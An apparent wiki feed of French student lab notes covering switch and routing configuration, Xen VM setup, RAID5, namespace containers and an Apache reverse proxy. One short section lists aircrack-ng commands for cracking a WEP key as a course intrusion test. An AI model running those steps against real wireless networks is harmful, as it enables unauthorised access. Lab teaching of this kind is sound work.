  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Suite à une erreur de manipulation le /var est mort&lt;br /&gt;
&lt;br /&gt;
Pour réaliser la suite du TP j'ai recrée une VM Dionysos2, même addresse IP.&lt;br /&gt;
&lt;br /&gt;
Il faut donc éteindre la VM Dionysos pour éviter tout problème&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur '''Cordouan''' =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de sites (IPv4) ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49067</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49067"/>
				<updated>2018-12-21T10:36:01Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Installation dans la machine virtuelle Xen */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
